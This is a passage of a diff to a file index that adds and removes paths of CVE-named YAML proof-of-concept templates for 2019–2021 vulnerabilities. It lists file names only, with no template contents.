+38560,7 @@ ./poc/cve/cve-2019-15043-3871.yaml ./poc/cve/cve-2019-15043-3872.yaml ./poc/cve/cve-2019-15043-3873.yaml +./poc/cve/cve-2019-15043.yaml ./poc/cve/cve-2019-15107-3874.yaml ./poc/cve/cve-2019-15107-3875.yaml ./poc/cve/cve-2019-15107-3876.yaml @@ -38582,6 +38574,8 @@ ./poc/cve/cve-2019-15713-3884.yaml ./poc/cve/cve-2019-15713-3885.yaml ./poc/cve/cve-2019-15713-3886.yaml +./poc/cve/cve-2019-15713-3887.yaml +./poc/cve/cve-2019-15811(1).yaml ./poc/cve/cve-2019-15858-3888.yaml ./poc/cve/cve-2019-15858-3889.yaml ./poc/cve/cve-2019-15858-3890.yaml @@ -38628,7 +38622,6 @@ ./poc/cve/cve-2019-16332-3931.yaml ./poc/cve/cve-2019-16332-3932.yaml ./poc/cve/cve-2019-16332-3933.yaml -./poc/cve/cve-2019-16332-3934.yaml ./poc/cve/cve-2019-16525-3935.yaml ./poc/cve/cve-2019-16525-3936.yaml ./poc/cve/cve-2019-16525-3937.yaml @@ -38661,13 +38654,14 @@ ./poc/cve/cve-2019-16920-3960.yaml ./poc/cve/cve-2019-16920-3961.yaml ./poc/cve/cve-2019-16920-3962.yaml +./poc/cve/cve-2019-16931(1).yaml ./poc/cve/cve-2019-16931-3963.yaml -./poc/cve/cve-2019-16932(1).yaml ./poc/cve/cve-2019-16932-3964.yaml ./poc/cve/cve-2019-16996-3965.yaml ./poc/cve/cve-2019-16997-3966.yaml ./poc/cve/cve-2019-16997-3967.yaml ./poc/cve/cve-2019-16997-3968.yaml +./poc/cve/cve-2019-17270-3969.yaml ./poc/cve/cve-2019-17270-3970.yaml ./poc/cve/cve-2019-17270-3971.yaml ./poc/cve/cve-2019-17270-3972.yaml @@ -38685,6 +38679,7 @@ ./poc/cve/cve-2019-17418-3981.yaml ./poc/cve/cve-2019-17418-3982.yaml ./poc/cve/cve-2019-17444-3983.yaml +./poc/cve/cve-2019-17444-3984.yaml ./poc/cve/cve-2019-17503-1.yaml ./poc/cve/cve-2019-17503-2.yaml ./poc/cve/cve-2019-17503-3985.yaml @@ -38696,7 +38691,6 @@ ./poc/cve/cve-2019-17506-3991.yaml ./poc/cve/cve-2019-17538-3992.yaml ./poc/cve/cve-2019-17538-3993.yaml -./poc/cve/cve-2019-17538-3994.yaml ./poc/cve/cve-2019-17538-3995.yaml ./poc/cve/cve-2019-17538-3996.yaml ./poc/cve/cve-2019-17558-3997.yaml @@ -38707,7 +38701,6 @@ ./poc/cve/cve-2019-17558.yaml ./poc/cve/cve-2019-1821-4003.yaml ./poc/cve/cve-2019-1821-4004.yaml -./poc/cve/cve-2019-18371(1).yaml ./poc/cve/cve-2019-18371-4005.yaml ./poc/cve/cve-2019-18393-4006.yaml ./poc/cve/cve-2019-18393-4007.yaml @@ -38723,7 +38716,6 @@ ./poc/cve/cve-2019-18394-4017.yaml ./poc/cve/cve-2019-18394-4018.yaml ./poc/cve/cve-2019-18394.yaml -./poc/cve/cve-2019-18665(1).yaml ./poc/cve/cve-2019-18665-4019.yaml ./poc/cve/cve-2019-18665-4020.yaml ./poc/cve/cve-2019-18818-4021.yaml @@ -38743,7 +38735,6 @@ ./poc/cve/cve-2019-19368-4036.yaml ./poc/cve/cve-2019-19368-4037.yaml ./poc/cve/cve-2019-19368-4038.yaml -./poc/cve/cve-2019-19368.yaml ./poc/cve/cve-2019-19719-4039.yaml ./poc/cve/cve-2019-19719-4040.yaml ./poc/cve/cve-2019-19719-4041.yaml @@ -38758,6 +38749,7 @@ ./poc/cve/cve-2019-19824-4050.yaml ./poc/cve/cve-2019-19824-4051.yaml ./poc/cve/cve-2019-19824-4052.yaml +./poc/cve/cve-2019-19824-4053.yaml ./poc/cve/cve-2019-19908-4054.yaml ./poc/cve/cve-2019-19908-4055.yaml ./poc/cve/cve-2019-19908-4056.yaml @@ -38792,11 +38784,10 @@ ./poc/cve/cve-2019-20183-4083.yaml ./poc/cve/cve-2019-20183-4084.yaml ./poc/cve/cve-2019-20183-4085.yaml +./poc/cve/cve-2019-20183-4086.yaml ./poc/cve/cve-2019-20210(1).yaml -./poc/cve/cve-2019-20224(1).yaml ./poc/cve/cve-2019-20224-4087.yaml ./poc/cve/cve-2019-20354(1).yaml -./poc/cve/cve-2019-20933(1).yaml ./poc/cve/cve-2019-2578-1.yaml ./poc/cve/cve-2019-2578-2.yaml ./poc/cve/cve-2019-2578-4088.yaml @@ -38829,6 +38820,7 @@ ./poc/cve/cve-2019-2729-4114.yaml ./poc/cve/cve-2019-2729-4115.yaml ./poc/cve/cve-2019-2767-4116.yaml +./poc/cve/cve-2019-2767-4117.yaml ./poc/cve/cve-2019-2767-4118.yaml ./poc/cve/cve-2019-2767-4119.yaml ./poc/cve/cve-2019-2767-4120.yaml @@ -38886,13 +38878,14 @@ ./poc/cve/cve-2019-5418-4169.yaml ./poc/cve/cve-2019-5418-4170.yaml ./poc/cve/cve-2019-5418-4171.yaml +./poc/cve/cve-2019-5418.yaml ./poc/cve/cve-2019-6112-4172.yaml ./poc/cve/cve-2019-6112-4173.yaml ./poc/cve/cve-2019-6112-4174.yaml ./poc/cve/cve-2019-6112-4175.yaml ./poc/cve/cve-2019-6112-4176.yaml ./poc/cve/cve-2019-6112-4177.yaml -./poc/cve/cve-2019-6112-4178.yaml +./poc/cve/cve-2019-6340(1).yaml ./poc/cve/cve-2019-6340-4179.yaml ./poc/cve/cve-2019-6340-4180.yaml ./poc/cve/cve-2019-6340-4181.yaml @@ -38906,7 +38899,6 @@ ./poc/cve/cve-2019-6715-4189.yaml ./poc/cve/cve-2019-6715-4190.yaml ./poc/cve/cve-2019-6715-4191.yaml -./poc/cve/cve-2019-7192-4192.yaml ./poc/cve/cve-2019-7192-4193.yaml ./poc/cve/cve-2019-7192-4194.yaml ./poc/cve/cve-2019-7219-4195.yaml @@ -38921,6 +38913,7 @@ ./poc/cve/cve-2019-7238-4204.yaml ./poc/cve/cve-2019-7238-4205.yaml ./poc/cve/cve-2019-7238-4206.yaml +./poc/cve/cve-2019-7238-4207.yaml ./poc/cve/cve-2019-7254-1.yaml ./poc/cve/cve-2019-7254-2.yaml ./poc/cve/cve-2019-7254-4208.yaml @@ -38937,12 +38930,13 @@ ./poc/cve/cve-2019-7275-4219.yaml ./poc/cve/cve-2019-7275-4220.yaml ./poc/cve/cve-2019-7275-4221.yaml +./poc/cve/cve-2019-7275-4222.yaml ./poc/cve/cve-2019-7275-4223.yaml +./poc/cve/cve-2019-7315(1).yaml ./poc/cve/cve-2019-7315-4224.yaml ./poc/cve/cve-2019-7315-4225.yaml ./poc/cve/cve-2019-7481-4226.yaml ./poc/cve/cve-2019-7481-4227.yaml -./poc/cve/cve-2019-7481-4228.yaml ./poc/cve/cve-2019-7481-4229.yaml ./poc/cve/cve-2019-7481-4230.yaml ./poc/cve/cve-2019-7543-1.yaml @@ -38956,7 +38950,6 @@ ./poc/cve/cve-2019-7609-4237.yaml ./poc/cve/cve-2019-7609-4238.yaml ./poc/cve/cve-2019-7609-4239.yaml -./poc/cve/cve-2019-8442(1).yaml ./poc/cve/cve-2019-8442-4240.yaml ./poc/cve/cve-2019-8442-4241.yaml ./poc/cve/cve-2019-8442-4242.yaml @@ -38976,7 +38969,6 @@ ./poc/cve/cve-2019-8449-4256.yaml ./poc/cve/cve-2019-8449-4257.yaml ./poc/cve/cve-2019-8449-4258.yaml -./poc/cve/cve-2019-8449.yaml ./poc/cve/cve-2019-8451-4259.yaml ./poc/cve/cve-2019-8451-4260.yaml ./poc/cve/cve-2019-8451-4261.yaml @@ -39067,6 +39059,7 @@ ./poc/cve/cve-2020-0618-4338.yaml ./poc/cve/cve-2020-0618-4339.yaml ./poc/cve/cve-2020-0618.yaml +./poc/cve/cve-2020-10124(1).yaml ./poc/cve/cve-2020-10148-4340.yaml ./poc/cve/cve-2020-10148-4341.yaml ./poc/cve/cve-2020-10148-4342.yaml @@ -39084,7 +39077,6 @@ ./poc/cve/cve-2020-10220-4354.yaml ./poc/cve/cve-2020-10220-4355.yaml ./poc/cve/cve-2020-10220-4356.yaml -./poc/cve/cve-2020-10220.yaml ./poc/cve/cve-2020-10546-4357.yaml ./poc/cve/cve-2020-10546-4358.yaml ./poc/cve/cve-2020-10546-4359.yaml @@ -39125,6 +39117,7 @@ ./poc/cve/cve-2020-11110-4394.yaml ./poc/cve/cve-2020-11450-4395.yaml ./poc/cve/cve-2020-11450-4396.yaml +./poc/cve/cve-2020-11455-4397.yaml ./poc/cve/cve-2020-11455-4398.yaml ./poc/cve/cve-2020-11455-4399.yaml ./poc/cve/cve-2020-11455-4400.yaml @@ -39141,7 +39134,7 @@ ./poc/cve/cve-2020-11530-4410.yaml ./poc/cve/cve-2020-11530-4411.yaml ./poc/cve/cve-2020-11530-4412.yaml -./poc/cve/cve-2020-11530.yaml +./poc/cve/cve-2020-11546-4413.yaml ./poc/cve/cve-2020-11546-4414.yaml ./poc/cve/cve-2020-11547-1.yaml ./poc/cve/cve-2020-11547-2.yaml @@ -39156,7 +39149,6 @@ ./poc/cve/cve-2020-11710-4422.yaml ./poc/cve/cve-2020-11710-4423.yaml ./poc/cve/cve-2020-11710-4424.yaml -./poc/cve/cve-2020-11738(1).yaml ./poc/cve/cve-2020-11738-1.yaml ./poc/cve/cve-2020-11738-2.yaml ./poc/cve/cve-2020-11738-4425.yaml @@ -39182,7 +39174,6 @@ ./poc/cve/cve-2020-11930-4444.yaml ./poc/cve/cve-2020-11930-4445.yaml ./poc/cve/cve-2020-11930-4446.yaml -./poc/cve/cve-2020-11978(1).yaml ./poc/cve/cve-2020-11978-4447.yaml ./poc/cve/cve-2020-11978-4448.yaml ./poc/cve/cve-2020-11978-4449.yaml @@ -39222,14 +39213,12 @@ ./poc/cve/cve-2020-12720-4483.yaml ./poc/cve/cve-2020-12720-4484.yaml ./poc/cve/cve-2020-12720-4485.yaml -./poc/cve/cve-2020-12720.yaml ./poc/cve/cve-2020-12800-4486.yaml ./poc/cve/cve-2020-12800-4487.yaml ./poc/cve/cve-2020-12800-4488.yaml +./poc/cve/cve-2020-13117-4489.yaml ./poc/cve/cve-2020-13117-4490.yaml ./poc/cve/cve-2020-13117-4491.yaml -./poc/cve/cve-2020-13121(1).yaml -./poc/cve/cve-2020-13158(1).yaml ./poc/cve/cve-2020-13158-4492.yaml ./poc/cve/cve-2020-13158-4493.yaml ./poc/cve/cve-2020-13158-4494.yaml @@ -39254,7 +39243,6 @@ ./poc/cve/cve-2020-13700-4510.yaml ./poc/cve/cve-2020-13700-4511.yaml ./poc/cve/cve-2020-13700-4512.yaml -./poc/cve/cve-2020-13700-4513.yaml ./poc/cve/cve-2020-13927-4514.yaml ./poc/cve/cve-2020-13927-4515.yaml ./poc/cve/cve-2020-13927-4516.yaml @@ -39272,7 +39260,6 @@ ./poc/cve/cve-2020-13942-4530.yaml ./poc/cve/cve-2020-13942-4531.yaml ./poc/cve/cve-2020-13942-4532.yaml -./poc/cve/cve-2020-13942.yaml ./poc/cve/cve-2020-13945-4533.yaml ./poc/cve/cve-2020-13945-4534.yaml ./poc/cve/cve-2020-13945-4535.yaml @@ -39301,10 +39288,10 @@ ./poc/cve/cve-2020-14750-4558.yaml ./poc/cve/cve-2020-14750-4559.yaml ./poc/cve/cve-2020-14750-4560.yaml -./poc/cve/cve-2020-14750.yaml ./poc/cve/cve-2020-14815-4561.yaml ./poc/cve/cve-2020-14815-4562.yaml ./poc/cve/cve-2020-14815-4563.yaml +./poc/cve/cve-2020-14864(1).yaml ./poc/cve/cve-2020-14864-4564.yaml ./poc/cve/cve-2020-14864-4565.yaml ./poc/cve/cve-2020-14864-4566.yaml @@ -39322,7 +39309,6 @@ ./poc/cve/cve-2020-14882-4577.yaml ./poc/cve/cve-2020-14882-4578.yaml ./poc/cve/cve-2020-14882-4579.yaml -./poc/cve/cve-2020-14882.yaml ./poc/cve/cve-2020-14883-1.yaml ./poc/cve/cve-2020-14883-2.yaml ./poc/cve/cve-2020-14883-4580.yaml @@ -39336,7 +39322,6 @@ ./poc/cve/cve-2020-15004-4588.yaml ./poc/cve/cve-2020-15004-4589.yaml ./poc/cve/cve-2020-15050-4590.yaml -./poc/cve/cve-2020-15050-4591.yaml ./poc/cve/cve-2020-15050-4592.yaml ./poc/cve/cve-2020-15129-4593.yaml ./poc/cve/cve-2020-15129-4595.yaml @@ -39374,6 +39359,7 @@ ./poc/cve/cve-2020-15920-4627.yaml ./poc/cve/cve-2020-15920-4628.yaml ./poc/cve/cve-2020-15920-4629.yaml +./poc/cve/cve-2020-15920.yaml ./poc/cve/cve-2020-16139-4630.yaml ./poc/cve/cve-2020-16139-4631.yaml ./poc/cve/cve-2020-16139-4632.yaml @@ -39381,7 +39367,6 @@ ./poc/cve/cve-2020-16139-4634.yaml ./poc/cve/cve-2020-16139-4635.yaml ./poc/cve/cve-2020-16139-4636.yaml -./poc/cve/cve-2020-16139.yaml ./poc/cve/cve-2020-16270-4637.yaml ./poc/cve/cve-2020-16270-4638.yaml ./poc/cve/cve-2020-16270-4639.yaml @@ -39391,6 +39376,7 @@ ./poc/cve/cve-2020-16846-4644.yaml ./poc/cve/cve-2020-16846-4645.yaml ./poc/cve/cve-2020-16846-4646.yaml +./poc/cve/cve-2020-16920-4647.yaml ./poc/cve/cve-2020-16920-4648.yaml ./poc/cve/cve-2020-16952-4649.yaml ./poc/cve/cve-2020-16952-4650.yaml @@ -39461,11 +39447,9 @@ ./poc/cve/cve-2020-19360-4713.yaml ./poc/cve/cve-2020-19360-4714.yaml ./poc/cve/cve-2020-1938-4715.yaml -./poc/cve/cve-2020-1938-4716.yaml ./poc/cve/cve-2020-1938-4717.yaml ./poc/cve/cve-2020-1943-4718.yaml ./poc/cve/cve-2020-1943-4719.yaml -./poc/cve/cve-2020-1943-4720.yaml ./poc/cve/cve-2020-1943-4721.yaml ./poc/cve/cve-2020-1943-4722.yaml ./poc/cve/cve-2020-19625-4723.yaml @@ -39492,12 +39476,12 @@ ./poc/cve/cve-2020-20982-4741.yaml ./poc/cve/cve-2020-20982-4742.yaml ./poc/cve/cve-2020-20982-4743.yaml -./poc/cve/cve-2020-20988(1).yaml ./poc/cve/cve-2020-2103-4744.yaml ./poc/cve/cve-2020-2103-4745.yaml ./poc/cve/cve-2020-2103-4746.yaml ./poc/cve/cve-2020-21224-4747.yaml ./poc/cve/cve-2020-21224-4748.yaml +./poc/cve/cve-2020-21224-4749.yaml ./poc/cve/cve-2020-21224-4750.yaml ./poc/cve/cve-2020-21224-4751.yaml ./poc/cve/cve-2020-21224-4752.yaml @@ -39510,9 +39494,8 @@ ./poc/cve/cve-2020-2199-4757.yaml ./poc/cve/cve-2020-2199-4758.yaml ./poc/cve/cve-2020-2199-4759.yaml -./poc/cve/cve-2020-22209(1).yaml -./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml +./poc/cve/cve-2020-22210.yaml ./poc/cve/cve-2020-22211(1).yaml ./poc/cve/cve-2020-22840-4761.yaml ./poc/cve/cve-2020-22840-4763.yaml @@ -39520,7 +39503,6 @@ ./poc/cve/cve-2020-22840-4765.yaml ./poc/cve/cve-2020-22840-4766.yaml ./poc/cve/cve-2020-22840-4767.yaml -./poc/cve/cve-2020-22840.yaml ./poc/cve/cve-2020-23015-4768.yaml ./poc/cve/cve-2020-23015-4769.yaml ./poc/cve/cve-2020-23015-4770.yaml @@ -39532,6 +39514,7 @@ ./poc/cve/cve-2020-23517-4776.yaml ./poc/cve/cve-2020-23517-4777.yaml ./poc/cve/cve-2020-23517-4778.yaml +./poc/cve/cve-2020-23517.yaml ./poc/cve/cve-2020-23575-4779.yaml ./poc/cve/cve-2020-23575-4780.yaml ./poc/cve/cve-2020-23575-4781.yaml @@ -39558,6 +39541,7 @@ ./poc/cve/cve-2020-24223-4802.yaml ./poc/cve/cve-2020-24223-4803.yaml ./poc/cve/cve-2020-24223-4804.yaml +./poc/cve/cve-2020-24223.yaml ./poc/cve/cve-2020-24312-4805.yaml ./poc/cve/cve-2020-24312-4806.yaml ./poc/cve/cve-2020-24312-4807.yaml @@ -39626,7 +39610,6 @@ ./poc/cve/cve-2020-25223-4871.yaml ./poc/cve/cve-2020-25495-4872.yaml ./poc/cve/cve-2020-25495-4873.yaml -./poc/cve/cve-2020-25495-4874.yaml ./poc/cve/cve-2020-25495-4875.yaml ./poc/cve/cve-2020-25495-4876.yaml ./poc/cve/cve-2020-25506-1.yaml @@ -39648,11 +39631,11 @@ ./poc/cve/cve-2020-25540-4890.yaml ./poc/cve/cve-2020-25540-4891.yaml ./poc/cve/cve-2020-25540-4892.yaml -./poc/cve/cve-2020-25540.yaml ./poc/cve/cve-2020-2555.yaml ./poc/cve/cve-2020-25780-4893.yaml ./poc/cve/cve-2020-25780-4894.yaml ./poc/cve/cve-2020-25780-4895.yaml +./poc/cve/cve-2020-25864-4896.yaml ./poc/cve/cve-2020-25864-4897.yaml ./poc/cve/cve-2020-25864-4898.yaml ./poc/cve/cve-2020-26067-4899.yaml @@ -39696,6 +39679,7 @@ ./poc/cve/cve-2020-27361-4943.yaml ./poc/cve/cve-2020-27361-4944.yaml ./poc/cve/cve-2020-27361-4945.yaml +./poc/cve/cve-2020-27361-4946.yaml ./poc/cve/cve-2020-27361-4947.yaml ./poc/cve/cve-2020-27467-4948.yaml ./poc/cve/cve-2020-27467-4949.yaml @@ -39727,6 +39711,7 @@ ./poc/cve/cve-2020-28188-4976.yaml ./poc/cve/cve-2020-28208-4977.yaml ./poc/cve/cve-2020-28208-4978.yaml +./poc/cve/cve-2020-28208-4979.yaml ./poc/cve/cve-2020-28208-4980.yaml ./poc/cve/cve-2020-28351-4981.yaml ./poc/cve/cve-2020-28351-4982.yaml @@ -39754,11 +39739,13 @@ ./poc/cve/cve-2020-29395-5004.yaml ./poc/cve/cve-2020-29395-5005.yaml ./poc/cve/cve-2020-29395-5006.yaml +./poc/cve/cve-2020-29395.yaml ./poc/cve/cve-2020-29453-1.yaml ./poc/cve/cve-2020-29453-5007.yaml ./poc/cve/cve-2020-29453-5008.yaml ./poc/cve/cve-2020-29453-5009.yaml ./poc/cve/cve-2020-29453-5010.yaml +./poc/cve/cve-2020-29597(1).yaml ./poc/cve/cve-2020-3187-5011.yaml ./poc/cve/cve-2020-3187-5012.yaml ./poc/cve/cve-2020-3187-5014.yaml @@ -39834,7 +39821,6 @@ ./poc/cve/cve-2020-35774-5082.yaml ./poc/cve/cve-2020-3580-5083.yaml ./poc/cve/cve-2020-3580-5084.yaml -./poc/cve/cve-2020-3580-5085.yaml ./poc/cve/cve-2020-3580-5086.yaml ./poc/cve/cve-2020-3580-5087.yaml ./poc/cve/cve-2020-35846-5088.yaml @@ -39871,11 +39857,13 @@ ./poc/cve/cve-2020-36287.yaml ./poc/cve/cve-2020-36289-1.yaml ./poc/cve/cve-2020-36289-2.yaml +./poc/cve/cve-2020-36289-5120.yaml ./poc/cve/cve-2020-36289-5121.yaml ./poc/cve/cve-2020-36289-5122.yaml ./poc/cve/cve-2020-36365-5123.yaml ./poc/cve/cve-2020-36365-5124.yaml ./poc/cve/cve-2020-36365-5125.yaml +./poc/cve/cve-2020-36510(1).yaml ./poc/cve/cve-2020-3952-5127.yaml ./poc/cve/cve-2020-3952-5128.yaml ./poc/cve/cve-2020-3952-5129.yaml @@ -39889,6 +39877,7 @@ ./poc/cve/cve-2020-4463-5135.yaml ./poc/cve/cve-2020-4463-5136.yaml ./poc/cve/cve-2020-4463-5137.yaml +./poc/cve/cve-2020-4463.yaml ./poc/cve/cve-2020-5284-5138.yaml ./poc/cve/cve-2020-5284-5139.yaml ./poc/cve/cve-2020-5284-5140.yaml @@ -39897,7 +39886,6 @@ ./poc/cve/cve-2020-5284-5143.yaml ./poc/cve/cve-2020-5284-5144.yaml ./poc/cve/cve-2020-5284-5145.yaml -./poc/cve/cve-2020-5284.yaml ./poc/cve/cve-2020-5307-5146.yaml ./poc/cve/cve-2020-5307-5147.yaml ./poc/cve/cve-2020-5307-5148.yaml @@ -39929,6 +39917,7 @@ ./poc/cve/cve-2020-5412-5175.yaml ./poc/cve/cve-2020-5412-5176.yaml ./poc/cve/cve-2020-5775-5177.yaml +./poc/cve/cve-2020-5775-5178.yaml ./poc/cve/cve-2020-5776-1.yaml ./poc/cve/cve-2020-5776-2.yaml ./poc/cve/cve-2020-5776-5179.yaml @@ -39944,6 +39933,7 @@ ./poc/cve/cve-2020-5777-5189.yaml ./poc/cve/cve-2020-5847-5190.yaml ./poc/cve/cve-2020-5847-5191.yaml +./poc/cve/cve-2020-5847-5192.yaml ./poc/cve/cve-2020-5847-5193.yaml ./poc/cve/cve-2020-5847-5194.yaml ./poc/cve/cve-2020-5847-5195.yaml @@ -39961,7 +39951,6 @@ ./poc/cve/cve-2020-5902-5202.yaml ./poc/cve/cve-2020-6171-5203.yaml ./poc/cve/cve-2020-6171-5204.yaml -./poc/cve/cve-2020-6171-5205.yaml ./poc/cve/cve-2020-6207-5206.yaml ./poc/cve/cve-2020-6207-5207.yaml ./poc/cve/cve-2020-6207-5208.yaml @@ -40041,7 +40030,6 @@ ./poc/cve/cve-2020-8115-5278.yaml ./poc/cve/cve-2020-8115-5279.yaml ./poc/cve/cve-2020-8115-5280.yaml -./poc/cve/cve-2020-8115.yaml ./poc/cve/cve-2020-8163-5281.yaml ./poc/cve/cve-2020-8163-5282.yaml ./poc/cve/cve-2020-8163-5283.yaml @@ -40100,7 +40088,6 @@ ./poc/cve/cve-2020-8641-5333.yaml ./poc/cve/cve-2020-8641-5334.yaml ./poc/cve/cve-2020-8644-5335.yaml -./poc/cve/cve-2020-8654(1).yaml ./poc/cve/cve-2020-8771-5336.yaml ./poc/cve/cve-2020-8771-5337.yaml ./poc/cve/cve-2020-8771-5338.yaml @@ -40124,7 +40111,6 @@ ./poc/cve/cve-2020-9036-5357.yaml ./poc/cve/cve-2020-9036-5358.yaml ./poc/cve/cve-2020-9036-5359.yaml -./poc/cve/cve-2020-9043(1).yaml ./poc/cve/cve-2020-9047-5360.yaml ./poc/cve/cve-2020-9047-5361.yaml ./poc/cve/cve-2020-9047-5362.yaml @@ -40199,7 +40185,6 @@ ./poc/cve/cve-2020-9757-5424.yaml ./poc/cve/cve-2020-9757-5425.yaml ./poc/cve/cve-2020-9757-5426.yaml -./poc/cve/cve-20200924a.yaml ./poc/cve/cve-2020–26073-4901.yaml ./poc/cve/cve-2020–26073-4903.yaml ./poc/cve/cve-2020–26073-4905.yaml @@ -40220,7 +40205,6 @@ ./poc/cve/cve-2021-1499-5440.yaml ./poc/cve/cve-2021-20031-5441.yaml ./poc/cve/cve-2021-20031-5442.yaml -./poc/cve/cve-2021-20038-5443.yaml ./poc/cve/cve-2021-20038-5444.yaml ./poc/cve/cve-2021-20038-5445.yaml ./poc/cve/cve-2021-20038-5446.yaml @@ -40246,6 +40230,7 @@ ./poc/cve/cve-2021-20124-5466.yaml ./poc/cve/cve-2021-20124-5468.yaml ./poc/cve/cve-2021-20150-5469.yaml +./poc/cve/cve-2021-20150-5470.yaml ./poc/cve/cve-2021-20150-5471.yaml ./poc/cve/cve-2021-20158-5472.yaml ./poc/cve/cve-2021-20158-5473.yaml @@ -40298,13 +40283,13 @@ ./poc/cve/cve-2021-21402-5519.yaml ./poc/cve/cve-2021-21402-5520.yaml ./poc/cve/cve-2021-21402-5521.yaml -./poc/cve/cve-2021-21402.yaml ./poc/cve/cve-2021-21479-5522.yaml ./poc/cve/cve-2021-21479-5523.yaml ./poc/cve/cve-2021-21479-5524.yaml ./poc/cve/cve-2021-21479-5525.yaml ./poc/cve/cve-2021-21479-5526.yaml ./poc/cve/cve-2021-21745-5527.yaml +./poc/cve/cve-2021-21799(1).yaml ./poc/cve/cve-2021-21801-5528.yaml ./poc/cve/cve-2021-21801-5529.yaml ./poc/cve/cve-2021-21801-5530.yaml @@ -40317,7 +40302,6 @@ ./poc/cve/cve-2021-21803-5538.yaml ./poc/cve/cve-2021-21803-5539.yaml ./poc/cve/cve-2021-21805(1).yaml -./poc/cve/cve-2021-21816-5540.yaml ./poc/cve/cve-2021-21816-5541.yaml ./poc/cve/cve-2021-21816-5542.yaml ./poc/cve/cve-2021-21881-5543.yaml @@ -40357,7 +40341,6 @@ ./poc/cve/cve-2021-22053-5579.yaml ./poc/cve/cve-2021-22053-5580.yaml ./poc/cve/cve-2021-22053-5581.yaml -./poc/cve/cve-2021-22054(1).yaml ./poc/cve/cve-2021-22054-5582.yaml ./poc/cve/cve-2021-22122-1.yaml ./poc/cve/cve-2021-22122-2.yaml @@ -40379,10 +40362,8 @@ ./poc/cve/cve-2021-22214-5598.yaml ./poc/cve/cve-2021-22214-5599.yaml ./poc/cve/cve-2021-22214-5600.yaml -./poc/cve/cve-2021-22214-5601.yaml ./poc/cve/cve-2021-22214-5602.yaml ./poc/cve/cve-2021-22214-5603.yaml -./poc/cve/cve-2021-22502(1).yaml ./poc/cve/cve-2021-22873-1.yaml ./poc/cve/cve-2021-22873-2.yaml ./poc/cve/cve-2021-22873-3.yaml @@ -40395,6 +40376,7 @@ ./poc/cve/cve-2021-22873-5609.yaml ./poc/cve/cve-2021-22873-5610.yaml ./poc/cve/cve-2021-22873-6.yaml +./poc/cve/cve-2021-22873.yaml ./poc/cve/cve-2021-22986-5611.yaml ./poc/cve/cve-2021-22986-5612.yaml ./poc/cve/cve-2021-22986-5613.yaml @@ -40437,29 +40419,27 @@ ./poc/cve/cve-2021-24235-5651.yaml ./poc/cve/cve-2021-24235-5652.yaml ./poc/cve/cve-2021-24235-5653.yaml +./poc/cve/cve-2021-24236(1).yaml ./poc/cve/cve-2021-24237-5654.yaml ./poc/cve/cve-2021-24237-5655.yaml ./poc/cve/cve-2021-24237-5656.yaml -./poc/cve/cve-2021-24237-5657.yaml ./poc/cve/cve-2021-24245(1).yaml ./poc/cve/cve-2021-24274-5658.yaml ./poc/cve/cve-2021-24274-5659.yaml ./poc/cve/cve-2021-24274-5660.yaml +./poc/cve/cve-2021-24275-5661.yaml ./poc/cve/cve-2021-24275-5662.yaml ./poc/cve/cve-2021-24275-5663.yaml -./poc/cve/cve-2021-24276-5664.yaml ./poc/cve/cve-2021-24276-5665.yaml ./poc/cve/cve-2021-24276-5666.yaml ./poc/cve/cve-2021-24278-5667.yaml ./poc/cve/cve-2021-24278-5668.yaml ./poc/cve/cve-2021-24278-5669.yaml -./poc/cve/cve-2021-24284(1).yaml ./poc/cve/cve-2021-24285-5670.yaml ./poc/cve/cve-2021-24285-5671.yaml ./poc/cve/cve-2021-24285-5672.yaml ./poc/cve/cve-2021-24285-5673.yaml ./poc/cve/cve-2021-24285-5674.yaml -./poc/cve/cve-2021-24286(1).yaml ./poc/cve/cve-2021-24288-5675.yaml ./poc/cve/cve-2021-24288-5676.yaml ./poc/cve/cve-2021-24288-5677.yaml @@ -40482,7 +40462,6 @@ ./poc/cve/cve-2021-24316-5693.yaml ./poc/cve/cve-2021-24316-5694.yaml ./poc/cve/cve-2021-24316-5695.yaml -./poc/cve/cve-2021-24320-5696.yaml ./poc/cve/cve-2021-24320-5697.yaml ./poc/cve/cve-2021-24320-5698.yaml ./poc/cve/cve-2021-24320-5699.yaml @@ -40497,11 +40476,9 @@ ./poc/cve/cve-2021-24340-5708.yaml ./poc/cve/cve-2021-24340-5709.yaml ./poc/cve/cve-2021-24340-5710.yaml -./poc/cve/cve-2021-24340-5711.yaml ./poc/cve/cve-2021-24340-5712.yaml ./poc/cve/cve-2021-24342-5713.yaml ./poc/cve/cve-2021-24342-5714.yaml -./poc/cve/cve-2021-24342-5715.yaml ./poc/cve/cve-2021-24358-5716.yaml ./poc/cve/cve-2021-24358-5717.yaml ./poc/cve/cve-2021-24358-5718.yaml @@ -40532,13 +40509,12 @@ ./poc/cve/cve-2021-24472-5744.yaml ./poc/cve/cve-2021-24472-5745.yaml ./poc/cve/cve-2021-24472-5746.yaml -./poc/cve/cve-2021-24488(1).yaml ./poc/cve/cve-2021-24495-1.yaml ./poc/cve/cve-2021-24495-2.yaml ./poc/cve/cve-2021-24495-5747.yaml -./poc/cve/cve-2021-24495-5748.yaml ./poc/cve/cve-2021-24495-5749.yaml ./poc/cve/cve-2021-24495-5750.yaml +./poc/cve/cve-2021-24498-5751.yaml ./poc/cve/cve-2021-24498-5752.yaml ./poc/cve/cve-2021-24498-5753.yaml ./poc/cve/cve-2021-24498-5754.yaml @@ -40558,6 +40534,7 @@ ./poc/cve/cve-2021-24838-5769.yaml ./poc/cve/cve-2021-24838-5770.yaml ./poc/cve/cve-2021-24891(1).yaml +./poc/cve/cve-2021-24910(1).yaml ./poc/cve/cve-2021-24926-5772.yaml ./poc/cve/cve-2021-24947-5773.yaml ./poc/cve/cve-2021-24947-5774.yaml @@ -40568,13 +40545,11 @@ ./poc/cve/cve-2021-24997-5780.yaml ./poc/cve/cve-2021-24997-5781.yaml ./poc/cve/cve-2021-24997-5782.yaml -./poc/cve/cve-2021-25008(1).yaml ./poc/cve/cve-2021-25028-5783.yaml ./poc/cve/cve-2021-25028-5784.yaml ./poc/cve/cve-2021-25028-5785.yaml ./poc/cve/cve-2021-25028-5786.yaml ./poc/cve/cve-2021-25028-5787.yaml -./poc/cve/cve-2021-25033(1).yaml ./poc/cve/cve-2021-25033-5788.yaml ./poc/cve/cve-2021-25052-5789.yaml ./poc/cve/cve-2021-25052-5790.yaml @@ -40587,7 +40562,6 @@ ./poc/cve/cve-2021-25074-5798.yaml ./poc/cve/cve-2021-25074-5799.yaml ./poc/cve/cve-2021-25074-5800.yaml -./poc/cve/cve-2021-25075(1).yaml ./poc/cve/cve-2021-25085(1).yaml ./poc/cve/cve-2021-25111-5801.yaml 